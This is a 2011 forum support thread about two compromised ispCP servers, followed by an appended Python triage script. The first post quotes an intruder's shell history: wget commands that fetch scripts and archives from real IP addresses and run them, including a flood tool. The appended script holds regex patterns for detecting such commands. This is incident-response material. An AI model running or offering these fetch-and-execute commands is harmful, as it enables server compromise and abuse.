2 Omega boxes hacked...
ispCP - Board - Support (http://www.isp-control.net/forum)
2 Omega boxes hacked... - robmorin - 05-06-2011 02:00 AM

Hello all, long time no post.

I had a friend call me to say he had 2 Debian servers acting funny. It turns out they were both hacked, and both servers run ispCP.

Both servers had weird running Perl scripts and httpd binaries running as user vu2000.

He is using version ispCP 1.0.0 RC7 OMEGA build: 20081212 Priamos.

That user has no shell in the passwd file; however, the .bash_history file for that user on both boxes had this in it:

    /sbin/ifconfig|grep inet
    cd /dev/shm
    wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
    cd /dev/shm
    ls
    rm -rf *
    ls -al
    cd /tmp
    ls -a
    cd .ICE-unix
    ls -a
    wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
    cd ..
    rm -rf .l
    wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood

There must be an exploit somewhere...

Now I left one box running, still hacked, so as to maybe find more info to help out in case it is an exploit... So what's the next step?

Thanks...

RE: 2 Omega boxes hacked... - fluser - 05-06-2011 07:09 PM

Cut the network cable! That would be the first thing.

RE: 2 Omega boxes hacked... - c0urier - 05-07-2011 12:25 AM

As far as I know there have been several exploits since 1.0.0-RC7. Ever thought about upgrading to a newer version, ex. 1.0.7?
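A triage sketch for the situation in the first post, added here as an example and not written by anyone in the thread: it lists accounts whose passwd entry has no login shell but which still have shell history, and flags history lines matching the patterns visible in the quoted `.bash_history`. The rule names, the `/bin/false` shell and home path for vu2000, and the sample data (with a TEST-NET address) are assumptions constructed for illustration.

```python
import re

NO_LOGIN_SHELLS = {"", "/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

# Heuristics derived from the patterns visible in the quoted history.
RULES = [
    ("download from a bare IP address",
     re.compile(r"\b(?:wget|curl)\b.*https?://\d{1,3}(?:\.\d{1,3}){3}(?=[/:\s]|$)")),
    ("download chained into an interpreter or ./binary",
     re.compile(r"\b(?:wget|curl)\b.*[;&|]\s*(?:(?:sh|bash|perl|python[23]?)\b|\./)")),
    ("staging in a world-writable directory",
     re.compile(r"\bcd\s+(?:/dev/shm|/tmp|/var/tmp)\b")),
    ("enters a hidden directory",  # matches "cd .name", not "cd .."
     re.compile(r"\bcd\s+\.[^./\s]")),
]

# Constructed sample input (hypothetical passwd entries, TEST-NET address).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "vu2000:x:2000:2000::/home/vu2000:/bin/false\n"
    "www-data:x:33:33::/var/www:/usr/sbin/nologin\n"
)
SAMPLE_HISTORIES = {
    "root": ["apt-get update", "cd /tmp"],
    "vu2000": [
        "cd /dev/shm",
        "wget http://192.0.2.10/.x/job.sh ; sh job.sh",
        "cd .ICE-unix", "cd ..", "ls -a",
    ],
}

def nologin_users(passwd_text):
    """Names of accounts whose seventh passwd field is not a login shell."""
    users = set()
    for entry in passwd_text.splitlines():
        fields = entry.split(":")
        if len(fields) == 7 and fields[6].strip() in NO_LOGIN_SHELLS:
            users.add(fields[0])
    return users

def triage(passwd_text, histories):
    """Return (user, line_no, rule, command) findings for no-login accounts."""
    findings = []
    for user in sorted(nologin_users(passwd_text)):
        lines = [l for l in histories.get(user, []) if l.strip()]
        if lines:  # any history at all is anomalous for such an account
            findings.append((user, 0, "no-login account has shell history", ""))
        for no, cmd in enumerate(lines, 1):
            findings.extend((user, no, n, cmd) for n, rx in RULES if rx.search(cmd))
    return findings
```

On a host under investigation, pass the contents of `/etc/passwd` and each account's `.bash_history` read from a mounted or imaged copy of the disk. Shell history is easy to edit or disable, so an empty result does not show an account is clean.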